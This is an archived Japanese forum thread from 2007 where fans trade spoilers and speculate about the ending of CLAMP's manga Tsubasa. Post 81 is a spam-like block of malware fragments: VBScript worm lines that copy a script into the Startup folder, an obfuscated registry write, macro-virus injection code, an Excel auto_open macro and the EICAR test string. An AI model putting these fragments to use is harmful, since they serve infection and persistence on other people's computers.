5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ツバサ−RESERVoir CHRoNiCLE−ネタバレスレッド 6

1 :名無しさんの次レスにご期待下さい:2007/01/07(日) 12:40:48 ID:6vSZ549k
このスレは、CLAMPが週刊少年マガジンで連載している
『ツバサ−RESERVoir CHRoNiCLE−』の本誌ネタバレスレッドです。
ネタバレを水曜日まで知りたくない人は本スレへ。
バレ師さんによるバレはだいたい土曜日の夜。

次スレは>>970が立ててください。駄目だった場合は他の人に依頼を。

sage進行推奨。

過去ログ、本スレ、関連リンクは>>2

2 :名無しさんの次レスにご期待下さい:2007/01/07(日) 12:41:18 ID:6vSZ549k
■過去スレ
ツバサ−RESERVoir CHRoNiCLE−ネタバレスレッド 5
http://etc4.2ch.net/test/read.cgi/wcomic/1164580124/
ツバサ−RESERVoir CHRoNiCLE−ネタバレスレッド 4
http://etc4.2ch.net/test/read.cgi/wcomic/1162599313/
ツバサ−RESERVoir CHRoNiCLE−ネタバレスレッド3
http://etc4.2ch.net/test/read.cgi/wcomic/1160316913/
ツバサ−RESERVoir CHRoNiCLE−ネタバレスレッド 2
http://etc4.2ch.net/test/read.cgi/wcomic/1157815282/
ツバサ−RESERVoir CHRoNiCLE−ネタバレスレッド
http://etc4.2ch.net/test/read.cgi/wcomic/1154233803/

■本スレ
★CLAMP『ツバサ−RESERVoir CHRoNiCLE−』★22
http://etc4.2ch.net/test/read.cgi/wcomic/1164432474/

■ノートントラップ対策法
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap

3 :名無しさんの次レスにご期待下さい:2007/01/07(日) 12:45:02 ID:FtZg12Xf
∧,,∧   ぎゃあ久し振りの荒らしも糞にもならないほど刺激がなく
ミ,,・∀・ミ
ミuu_@

4 :名無しさんの次レスにご期待下さい:2007/01/07(日) 13:00:22 ID:XGKbF6sl
>>1
スレ立て乙です

5 :名無しさんの次レスにご期待下さい:2007/01/07(日) 13:24:01 ID:AJk8lbm5
乙です。
これ貼っておきますね

6 :名無しさんの次レスにご期待下さい:2007/01/07(日) 13:24:40 ID:AJk8lbm5
932 名前: ◆Ijbg3iR4eg [sage] 投稿日: 2007/01/06(土) 19:55:59 ID:2J66Q9MZ
Chapitre.139 迷宮の少女
傷付き倒れる真小狼。敵の武器から火花が走る。
仕込み・飛び道具禁止のはずだが、イーグルはこれをスルー。
痺れ薬が、何よりさくらの迷いが、ファイたちを蝕む。

そもそもチェストーナメントに参戦したのは、前の国の復興資金に充てるため。
そう決めたさくらだったが、3人の姿を見て心が折れかける。
それを支えたのは、立ち上がった真小狼。
「‥‥勝つ」「だから‥‥そこにいろ」
敵の連携を全て見切り、右目に血が入っても心眼でしのぎ、これを打ち砕く。

アトヒキ:迷える姫も己さえも!新たな強さを持って渾身の一撃!!

コメント
麻雀、強くなりたいです。

7 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:29:37 ID:31VoKQUt
今どんな話なの?

8 :名無しさんの次レスにご期待下さい:2007/01/07(日) 17:31:37 ID:HJVQyU/Y
>>7
コピーが壊した世界を見てショックを受けた姫一行が、
その国の復興のために、マフィアが主催する闇の闘技試合で賞金を稼いでる。


9 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:40:18 ID:OkXkZw1z
そんであと2〜3週したらセレス国行って
ファ異変スタート
阿修羅王覚醒するって話を今日のイベントで言ってた
チィは知らん
酔ってたから聞き違いあるかも



10 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:43:31 ID:BItZcj3f
ファイ編は長くなりそうだなあ

11 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:44:06 ID:XGKbF6sl
>>9
乙です
セレス国でファイの異変阿修羅覚醒…大波乱ですな。たまらん

12 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:52:32 ID:ez/o8MpM
>>9
イベント報告キタ!乙です!


とうとうファイ編かー結局アシュラ王は追いかけて来るんじゃなくてファイがセレス国に戻るのか?
それよか覚醒したアシュラ王に連れ戻される展開が妥当か。

13 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:53:26 ID:7ks9ya4e
ファイの異変じゃなくてファイ編だろw

14 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:54:59 ID:XGKbF6sl
ファ異変…ファイ編か
何やってんだ俺…orz

15 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:55:15 ID:OkXkZw1z
すまんファ異変はファイ編……

16 :名無しさんの次レスにご期待下さい:2007/01/07(日) 22:56:42 ID:DSjWGZR6
>>9乙!
着々と終わりに近付いてる感じがするな
サクラの精神状態を改善する時間はあるのか、全員テンパったまま突入か…

17 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:00:41 ID:BItZcj3f
てかこれを聞く限りいきなり1巻で過去話終了させられた黒鋼はなんなんだろう。


18 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:29:17 ID:fkC74Ff2
>>9
そういや今日はロフトでのトーク会か。乙です

マガジンのネタバレより盛り上がる「2〜3週後」w
あれ・・・・・でもそれが本当だとしたらイーグルの見せ場は・・・・・・

19 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:32:50 ID:TtpRgq3s
アシュラ王覚醒してセレス行った時ファイと引き合うコピーが突如現れたらカオス

20 :名無しさんの次レスにご期待下さい :2007/01/07(日) 23:36:46 ID:/JKuwebq
ファイ編にコピ−の出番はあるのだろうか・・・?
自分としてはそろそろ出てきて欲しい

21 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:50:27 ID:OkXkZw1z
だんだん酔いがさめてきた
ハッピーエンド宣言出ました
ただし一人以外…
ツバサのエンドをもってホリックのエンドに雪崩れ込む展開

一応他の参加者の話も聞いて判断してください
CLAMPも自分も酒入ってたので
そんじゃ




22 :名無しさんの次レスにご期待下さい:2007/01/07(日) 23:55:42 ID:TtpRgq3s
有益な情報、乙

>ハッピーエンド宣言出ました
>ただし一人以外…

ち ょ っ と 待 て


23 :sage    :2007/01/08(月) 00:00:07 ID:kNXfIarN
>>9>>21
イベ報告乙です
一人以外ハッピーエンドって…
その一人は誰なんだろうか。
ただハッピーエンドっていうくらいだから
小狼と姫はくっ付くんだろうなあと予想


24 : :2007/01/08(月) 00:01:23 ID:kNXfIarN
>>23です
上げてしまった…
申し訳ない!

25 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:02:53 ID:5X0EhSZB
一人以外か。けつあごだったらいいんだが
ファイか真か…
でもファイはクランプ的ハッピーエンドの予感

26 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:03:57 ID:LPHwoMbe
その一人って誰だよ!
気になるじゃないか!

27 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:07:48 ID:kXjBB2T/
うまいなークランプ

その一人が黒鋼だったら、日本国には帰れず仇は討てず銀龍は取り返せず・・・
あれ?別にいいじゃん、って気がしてきた
一人でも死んだらハッピーエンドじゃない気がするんで、誰も死なないと仮定すると
黒鋼はほぼハッピーエンド確定だな

28 :名無しさんの次レスにご期待下さい :2007/01/08(月) 00:12:26 ID:t2GKeRkd
不幸になるやつか・・・。ファイか真だな。きっと。
結局さくらはコピ−とくっつくのか。

29 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:13:19 ID:+CK1lM5L
真が一番ヤバい


30 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:16:06 ID:r5OYJj/P
一人って…
メインの仲間はハッピーで終わって欲しい

31 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:16:41 ID:kXjBB2T/
一人とそれ以外てのは、サクラ・真・コピー・黒・ファイの5人でおk?

真とコピーが両方ハッピーなエンディングってありえるのか?
それともコピーはすでにクランプの中でサクラ一行から除外されてるのか?

32 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:23:52 ID:vrLbPGLV
クランプのハッピーエンドってずれてるからなぁ
ファイはアシュラ王と一緒に死んだとしても大切な人と死ねたから
本人は幸せです、みたいな。
真は…真のハッピーエンドでなんだろう

33 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:27:21 ID:4+PAKTnq
コピーもやばい気が。あれだけ破壊活動して普通に復帰できると思えん
芽生えかけた心を真に託して消滅、とか・・・ないか

34 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:27:49 ID:PxAkeUhr
ファイが死ぬことはCLAMP的にはハッピーエンドな気がする。
ずっと死にたい死にたい言ってるからな。
HOLICとのリンクは今後ますます激しくなるの確定?

35 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:28:31 ID:QZ1KqO8b
>>32の言う通りクランプは、ずれまくってるから、あながちバッドエンドも悪くないかもな

36 :21:2007/01/08(月) 00:34:44 ID:N0pkIrbK
>>34
リンクは気にしなくても判る様に描いているけど
これからは厳しくなるって言ってた
ツバサのラストを受けてホリックの謎がラストで解けるかんじらしい

何時になるか判らんがイベント内容はWEBラジオで公開予定だって

37 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:41:31 ID:kXjBB2T/
>>34
いや、ファイがずっと言ってるのは「死ねない」な

「死にたい」は回想でのあれっきりじゃね?

38 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:42:07 ID:2K/e2h6m
ところでセレス国行くってことは、ファイは対価払い損じゃないか?
セレス国にだけは帰りたくないってのが願いだったんだから。
それともこれがイレズミ返してもらうって展開につながるのか?

39 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:46:29 ID:8ySfBbAl
まぁモコナは行き先をコントロール出来ないから
目的が果たせるかは運次第って最初に言われてたからな
ファイって運ないな・・・いろいろと

40 :名無しさんの次レスにご期待下さい:2007/01/08(月) 00:49:54 ID:5X0EhSZB
案外セレスに羽根あったりしないかな
そんでコピーと鉢合わせとか

そういやアシュラ王って強いのか?

41 :名無しさんの次レスにご期待下さい :2007/01/08(月) 01:09:18 ID:eeps+rZf
そりゃ強いんじゃないの?
ファイを追ってくるってことは次元移動できる力の持ち主ってことだし。

42 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:27:46 ID:7dmmdxNi
ファイが最終回の時点で死なない

ファイにとってのアンハッピー
もありえるって話だよな
Xの昴が近い感じか

43 :名無しさんの次レスにご期待下さい:2007/01/08(月) 01:38:12 ID:DKv4IaYJ
>>38
アシュラ王とかに強制送還されたら、セレス国に戻る可能性もあるんじゃ?

自分的には黒鋼もやばいと思う
日本国に帰ると度々話の中に出てくるから
CLAMPの事だしかえって帰れない可能性が高いような印象を受けなくもない

それに侑子さんがヒトの命を奪った対価は潰れるほど重いとホリックで言っていたにもかかわらず、
黒鋼はまだ日本国でヒトの命を奪った対価を特に払っていない

44 :名無しさんの次レスにご期待下さい:2007/01/08(月) 07:08:51 ID:qoUROlgg
やっぱ真な気がする俺…融合とか…まあファイ死ねないな終りかたかもしれんが。

45 :名無しさんの次レスにご期待下さい:2007/01/08(月) 08:05:37 ID:6o92RcFi
別に生き続けることがハッピーエンドじゃないとしたら
コピーの願いって羽根を集めることなんだから
羽根を全部集めて心取り戻したら、目をファイに返して消えるとかありそう
あんだけ国を潰し人殺ししてたら
死にたいって思うかもな、元の性格に戻ったらの話だけど
それぞれの望みがかなえばその人にとってのハッピーエンドじゃないの?
ファイだって死にたい望みがかなう・・・やっぱ黒鋼との約束かな?
死にたきゃ俺が殺してやるとかが叶うとか
ありがちだけどね。
こう考えてみると生きられそうなのは
サクラくらいかなw

46 :名無しさんの次レスにご期待下さい:2007/01/08(月) 09:15:55 ID:kXjBB2T/
>>45
コピーが羽根を集めるのはただのプログラムであって願いじゃないでしょ

それに、黒鋼はファイに言ったことを約束だと思ってるけど、ファイは約束とは思ってないよ
ファイが本当は何を望んでるかはまだ隠されてると思う
過去編やってからじゃないと明かされないんじゃないの

47 :名無しさんの次レスにご期待下さい:2007/01/08(月) 09:30:39 ID:6o92RcFi
>>46
じゃあ、コピーの願いって何?
心があったころも羽根を集めるのが一番の願いじゃなかったの?
心があったっていってもそれは真小狼の心だったんだけど・・
サクラの記憶の羽根を取り戻す
それをお願いしてユウコに旅に出してもらったんじゃない
サクラとの関係性を取り戻すことより羽根を取り戻すことが最初の願いだったんじゃ?

ファイの望みは明らかにはなってないけど、それはいえてるが
でも死にたがってることは確かだよね
死にたくても死なないというファイにとってのアンハッピーエンドはありか?


48 :名無しさんの次レスにご期待下さい:2007/01/08(月) 10:03:42 ID:umDhBVFM
かわいい真はオレがもらうことにするよw

49 :名無しさんの次レスにご期待下さい:2007/01/08(月) 10:17:01 ID:zQfsYz+P
個人的にはこう思った

本命:ファイ
対抗:真小狼
大穴:モコナ

('A`)

50 :名無しさんの次レスにご期待下さい:2007/01/08(月) 10:18:27 ID:ed8tifvO
いや真は俺が幸せにしてやるよ
後の面子は適当に殺伐としていてくれ

51 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:01:33 ID:kXjBB2T/
>>47
心があったころのコピーは何で羽根を集めてたいと思ってたか
1巻を読めばわかるが、それは羽根=サクラの生命力みたいなもんだったからだ

心があったコピーにとってはあくまで サクラ>羽根だったように思うけど
もし仮に羽根を集めようとするプログラムがなくて、羽根が無くてもサクラが大丈夫なら
コピーは羽根に固執しなかったと思う

52 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:29:06 ID:i5daKVkK
ハッピーエンド発言は嬉しい筈なのに、素直に喜べないなw
もうアンハッピーで終わるのは星火とかでいいじゃない
死んでるからそれならまだ諦めもつく。星火好きだけど。

ところで誰もサクラの心配をしてない件。
みんなサクラは絶対大丈夫と思ってるんだな…自分もだが。

53 :名無しさんの次レスにご期待下さい:2007/01/08(月) 11:46:09 ID:6o92RcFi
>>51
でも、さくらが既に元気になって
「そんなにもしてどうして羽根を集めるの?」と、さくらが聞いたとき
コピーは答えられなかったよ?レコルト国のの図書館での話しだけど。
サクラはコピー小狼にもう羽根の回収に伴う
キケンなことはして欲しくなかったんじゃないのか?
その気持ちをわかってやれなかったのは、
コピーは羽根を集めるために生まれたようなものだから、結局は
サクラとの関係性より羽根回収の方が重要だったっんじゃ
って言われても仕方ないよね
それに、こころがあったころっていってもそれは真小狼のこころが
コピーの本質を封印してたとも言えるし。
なくなったとたん、残酷なことしても平気になってるし

54 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:05:22 ID:Ci5gzPgO
ちょ、イーグルの見せ場が全然ない悪寒…

55 :名無しさんの次レスにご期待下さい :2007/01/08(月) 12:30:45 ID:t2GKeRkd
主役はきっと帰ってくるさ

56 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:36:50 ID:BLyxj6Ea
クランプ的ハッピーエンドなぁ……
真が危険、という説が結構あるけど、いろんな意味で危ない感じがするのはさくらのような気がする。
このままではどう考えても、コピーが元に戻るとは考えにくく、
真の好意を素直に受け取ることも出来ないと思うし……


57 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:39:29 ID:QK2CPTKl
どう考えても、あと2,3話でインフィニティが片付くとは思えないから、
CLAMPのいう「あと2,3週」は、本人たちが今描いてる所からってことじゃないかな?
多少は書き溜めしてるでしょうし

58 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:42:11 ID:gwW0QslZ
「ツバサのラストは、最初のさくらとコピーが泣きながらむかいあってる場面につながる」
てことからして、
アンハッピーになるのはコピーと予想。

さくらの心から完全にコピーの記憶が失われてさくらは心の平安?と取り戻すが
コピーの心はさくらの記憶と共にホリック世界へ行って、ワタヌキや小羽ちゃんや・・・
いろんなものに分散しちゃうんではないかと。

ファイが死ぬ、でもいいけど、ありがちっぽすぎるような。

59 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:45:31 ID:uuNlIhoQ
自分的に、今不幸路線をいってるファイが危ない気がする。じゃなかったら、真か?!真はいい奴扱いさせておいて、アボンさせたら、マジ泣く。
黒鋼ってのもあるけど、なんか普通に日本国帰りそうだし…
今後の展開マジこぇぇーorz

60 :名無しさんの次レスにご期待下さい:2007/01/08(月) 12:54:00 ID:l2voFsi4
>>53
いや答えられなかったのは、自分とサクラの関係性を対価に差し出してる以上
自分がサクラをいかに大事に思っているかなんてサクラ本人に言っても
サクラの重荷になるし、むなしいだけだからでは?

61 :名無しさんの次レスにご期待下さい :2007/01/08(月) 13:05:52 ID:t2GKeRkd
個人的に、クランプはさくらと小狼大好きみたいだから、
コピ−も真も死なないような気もする。
・・・でも、そうなるとさくらはいったいどっちの小狼とくっつくのか
って疑問も出てくるしなぁ・・・。

62 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:11:52 ID:rbqLbqx4
1巻の冒頭シーンの小狼が真かコピーか分からないから、どっちが姫とくっつくかはなんとも言えないよなあ…くっつくとも限らんし…

63 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:14:49 ID:grRyrFWa
ん?なんでサクラと真がくっつくと思うの?

64 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:18:53 ID:kXjBB2T/
>>53
レコルトでのサクラの「どうして」ってのは、「どうして羽根を集めるのか?」ではなく
「どうして私のためにそこまでしてくれるのか?」って問いかけだろう

コピーにプログラムがある以上、無意識にでも羽根を集めようとするのは当たり前
要点は、心があったときはそれが「サクラのため」だったってことだ
心が無いコピーは「サクラのため」ってのが欠落してるだろ?

あくまで心のあるコピーの最優先はサクラだとおもうがね


65 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:22:26 ID:KHfQuvUY
>>57
正直どういうイベントなのかとかどういう話の流れであと2、3週って出たか分かんないけど、
対読者への発言だったら今マガジンに載っている話から2、3週なんじゃないのか?

66 :名無しさんの次レスにご期待下さい:2007/01/08(月) 13:31:46 ID:uuNlIhoQ
そういや、セレス国行くんだったら、皆ファイが着てたフワフワな服着るのかな?!

67 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:21:31 ID:XMPyi7ju
着替える余裕が無いとオモ。
てかファイ自体いつも通り余裕かましてるか本気で壊れるかのどっちかだろうし

68 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:23:55 ID:6o92RcFi
>>64
サクラのために羽根をあつめるというのは分かるんだけど
でも今回の東京編ではすでに、コピーの本質が覚醒しちゃったから
もうわからないけど

例えば東京の時みたいに羽根があるために
その国の人たちが恩恵を受けていた場合
ここで同じようにサクラがもう羽根はいらないと思ったとしても
コピー小狼に人の心がまだあった場合であっても
コピーは羽根を回収すると思ったんだけど、どうかな?
それは本当にサクラのためと言えるのかどうか…

本人はサクラのため、サクラ最優先とか思っていても
サクラはどう思うかわからないよね
そこのところがコピーにはわからないんじゃないかなと思ったのさ
羽のためにつくられたものだからー

69 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:56:44 ID:l2voFsi4
>>68
羽根を戻すことがサクラのためだと信じられていた時でも
龍王が危険な目にあったら、羽根よりもたった一人の人命優先させるのに?
サクラがどう思うも何も、コピーの行動はサクラの意見を結構尊重したものだったと思うけど
穿ちすぎて毎度コピーに対してアンチ寄りの意見になってないか?

70 :名無しさんの次レスにご期待下さい:2007/01/08(月) 14:59:01 ID:xYfMwfdo
コピーがファイの目抉ったのは、一応元に戻れる方法が残されてる分セーフだとしても、
他の国の殺された人達は生き返るわけでもなく、取り返しのつかない事だと思う。
いくらケツアゴプログラムとは言っても、コピーが引き起こした全ての事も含めて、
サクラが本当にコピーを好きになれるのか考えると、少し微妙な希ガス。
個人的には、意外にコピーバッドエンドもあるかも、と予想。


とか言いつつ、真バッドエンドが一番ありそうで鬱(´・ω・`)

71 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:01:53 ID:XMPyi7ju
てかもう一人バッドエンドになってるじゃん>星火

72 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:05:13 ID:rbqLbqx4
そういえば星火の「もと」って誰なんだ?

73 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:07:42 ID:kXjBB2T/
>>68
コピーの願いの話だろ?

>>45の、羽が集まりきったら納得して成仏、みたいなのは
サクラを一番大事に思っているコピーにはふさわしくないってことであって
ifの話をしてるんじゃないんだが

74 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:53:28 ID:1kqwJMy4
そういえば、カイルの登場はまだか?

75 :名無しさんの次レスにご期待下さい:2007/01/08(月) 15:53:42 ID:6x+YrFdW
最近、写身であること、サクラと真は運命の相手?、真が主人公?、惨殺の責任を理由に
ボロクソに小狼を叩く(邪魔扱い)発言を多々みかける
みていて気分悪いよ
小狼ファンもここを見ていることを忘れないで欲しい

76 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:21:04 ID:Ci5gzPgO
今ひらめいた

ツバサ最終話で何か侑子さんにごっつい願い事をする(その対価が1話冒頭の別離)
そのままじゃあんまりなんでホリックでフォロー(また出会う可能性を匂わせるとか)

願い事はコピーの所業の清算かと一瞬思ったけど、侑子さんは人生き返らせたりしなさそうだからなぁ…

77 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:26:55 ID:r5OYJj/P
ホリックそのうち読もうとは思ってるけどまだ未読者な自分としては
ツバサの結末をホリックでフォローとかはやめて欲しいなー

78 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:42:03 ID:KHfQuvUY
そもそも侑子さんは生き返らすとか出来なくない?
夜叉王の件とかで言ってたよな?

1巻冒頭はコピーな希ガス。
サクラも離れるの嫌がってたし。
今のサクラと真見てたらサクラはあんなに嫌がりそうにないなぁ、と。

79 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:48:03 ID:w9BHTOBU
>>65
バレさんも書いてるけど、ロフトのイベントはアルコールありなんだよ。
だから、基本酔っぱらいの発言だということは念頭においてた方がいい。

>>67
でも、大雪降ってたジェイドより寒いようだと完全防備しないと死ねそうだよね。

80 :名無しさんの次レスにご期待下さい:2007/01/08(月) 16:54:59 ID:umDhBVFM
死んだ人は生き返らすことができなくても
過去は変えられるんだよなぁ。
それには生き返らすよりはたいした力いらないんでせうか?

81 :名無しさんの次レスにご期待下さい:2007/01/08(月) 18:33:36 ID:t5aG7GYd
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

82 :名無しさんの次レスにご期待下さい:2007/01/08(月) 19:06:22 ID:aWrdd3FF
>ハッピーエンド宣言出ました
>ただし一人以外…


順当に考えればファイだが

真かコピーのどちらかの可能性も高いな



てか、真小狼カッコヨス
「ぶれない強さ」ってのはあこがれるぜ

83 :名無しさんの次レスにご期待下さい :2007/01/08(月) 19:35:16 ID:8INXh7Ph
自分はコピーはないと思う。
なぜならコピーがアンハッピーエンドならサクラも自動的にアンハッピーになるし。
コピーがあぼんか行方不明でサクラがよかったよかったとはならないと思う。
仮に今までの記憶を全部なくして真と結ばれてもそれって・・・って感じだし。

そう考えると一人でもアンハッピー者がでると残り皆多かれ少なかれブルーだと思うんだが。
やっぱりファイの死ねなかったエンドだろうか。

もしクランプがギャグで言っていたのだとしたらとたんに黒鋼が最有力候補になる罠。

84 :名無しさんの次レスにご期待下さい:2007/01/08(月) 19:48:47 ID:6o92RcFi
何となく真小狼は死なない気がするなあ
一応クロウの血筋だし
クロウの血筋が絶えないためには侑子さんもなんとかするんじゃ?
侑子・クロウ側なのは間違いないみたいだし
侑子さんも四月一日のためにがんばってるんだからな


85 :名無しさんの次レスにご期待下さい:2007/01/08(月) 20:01:27 ID:gwW0QslZ
でも酷いようだが
コピーか真、どちらかはやはり消えるのが「世界の正常化」ということになるのではないかなあ。
真は消えないと思うから、やっぱりコピーが。
アンハッピーになるのはサクラ姫だと思う(コピーを失って。)
消えたコピーの魂はホリック世界を経巡って、輪廻を繰り返して(そのひとつがワタヌキだったり)
いつかサクラ姫の元へ・・・てなラストがくらむぷらしい。

86 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:21:14 ID:7dmmdxNi
3週先の議論もいいが
早売り買った方バレ投下お願いすます…

87 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:28:47 ID:qoUROlgg
黒鋼は今のままでも可哀想なので幸せになってほしい

88 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:40:35 ID:XMPyi7ju
知世とくっつくのが黒鋼にとっての幸せ。
だって特別なんでしょ?黒鋼にとって

89 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:41:28 ID:XMPyi7ju

ということをファンサイトで言っているアンチサクラがいましたとさ

90 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:42:55 ID:gwW0QslZ
知世もファイと同じで長命だったりしてね。


知世姫が一行を助けるために命を落とす(つまりアンハッピーになるのは黒鋼)だったら嫌だなあ。

91 :名無しさんの次レスにご期待下さい:2007/01/08(月) 21:49:01 ID:XMPyi7ju
>>90
クランプに限ってそれは無いとオモ。

92 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:52:42 ID:FxiYZNNO
>>86
今週は月曜が祝日だから、早売りは明日になるとオモ

93 :名無しさんの次レスにご期待下さい :2007/01/08(月) 22:57:43 ID:t2GKeRkd
コピ−とさくら、無事にくっついてほしいなぁ。
早くコピ−もどってきてほしい

94 :名無しさんの次レスにご期待下さい:2007/01/08(月) 22:58:44 ID:XMPyi7ju
バレ

痺れ薬は武器じゃなくて虫。
ジェオはイーグルに反対。イーグル無視。


これ位しか語る事無い・・・。
てか今回の回でサクラに愛想尽きた・・・。

95 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:01:12 ID:+CK1lM5L
偽善と言うわけじゃないが背負うべきもの間違ってる気はする

96 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:09:33 ID:BNYHQQLN
>>94は虫と無視を掛けているのかと思った。
詳細バレだった。




にわかせんぺいのお面つけて謝ってくる。

97 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:29:09 ID:QK2CPTKl
イーグルは、姫の強さが本物かどうか試そうとして、あえてルール違反を見逃したんだな。
動揺した姫に対して「君の強さは偽者だ」とでも言わせる展開とみた。


98 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:29:40 ID:KHfQuvUY
詳細バレ乙。

イーグル無視になんかワロタww

しかしレイアースってアニメ見てたけど幼稚園だったから内容覚えてない。
だからジェオが反対ってどういう感じか分からん。
スマン、本屋行ってくるorz

99 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:36:20 ID:XMPyi7ju
>>98
ルール違反だからジェオが反対。
イーグル無視。楽しそう。

ランティス空気。



そんなレイアース野郎組でした。


100 :名無しさんの次レスにご期待下さい:2007/01/08(月) 23:39:47 ID:FxiYZNNO
イーグルがサクラに「本当の強さというのはね云々」などと諭す展開になったら、
元作品的には「お前が言うな」だなw

101 :名無しさんの次レスにご期待下さい:2007/01/09(火) 00:08:19 ID:wMTPO3Er
>>94
詳細バレ乙

>>100
イーグルが突然、光を引き合いにして語りだしたりしたら個人的には嬉しい

102 :名無しさんの次レスにご期待下さい:2007/01/09(火) 02:58:58 ID:ChMAE3YR
どっかのサイトでファイは最高の笑顔で死なせるってクランプが言ってたって書いてたぞ

そんなことになったら、ファイはハッピーかもしれんが、オレがアンハッピーだ
クランプは幸せ感がちょいズレてるからイヤだ

103 :名無しさんの次レスにご期待下さい:2007/01/09(火) 03:31:47 ID:ioIOq3W2
>>102
そこのサイトの妄想だから気にしなくて良いとオモ

104 :名無しさんの次レスにご期待下さい:2007/01/09(火) 03:39:28 ID:ChMAE3YR
>>103 安心したthx

105 :名無しさんの次レスにご期待下さい:2007/01/09(火) 08:13:34 ID:8uqRGHgO
>>102
そしてその通りだと読者的には二人のアンアッピーエンド者がいるという事になるな。
まぁガセだろうけどね。

106 :名無しさんの次レスにご期待下さい:2007/01/09(火) 09:52:08 ID:wMTPO3Er
ファイは、昴流エンド(望みは叶わず生き残り)か孔雀エンド(自分の望みと命を引き換え)になると予想

107 :名無しさんの次レスにご期待下さい:2007/01/09(火) 10:26:52 ID:8uqRGHgO
孔雀ってなんの人?

108 :名無しさんの次レスにご期待下さい:2007/01/09(火) 10:45:57 ID:AX4nQ/YA
>>107
聖伝

109 :名無しさんの次レスにご期待下さい:2007/01/09(火) 12:03:41 ID:FclYizE0
>>106
孔雀ぽい感じをほのめかしといて、土壇場で黒鋼あたりが引き戻しそう

110 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:15:06 ID:d/rFC9N/
なんつーか…孔雀エンドだとしても昴流エンドだとしても
芸がないよな…

111 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:18:15 ID:mWDeIyJp
黒鋼に殺されるENDとか考えないのかね

112 :名無しさんの次レスにご期待下さい:2007/01/09(火) 13:31:52 ID:uKpepMaA
普通に考えれば、メインメンバーの誰かが不幸なら、物語全体としても
「ハッピーエンド」とは言えないと思う。
例えばファイが死ぬとすれば、小狼やサクラも本当に幸せにはなれないだろうし。
ということで、メインメンバー以外と予想…いや、希望で。

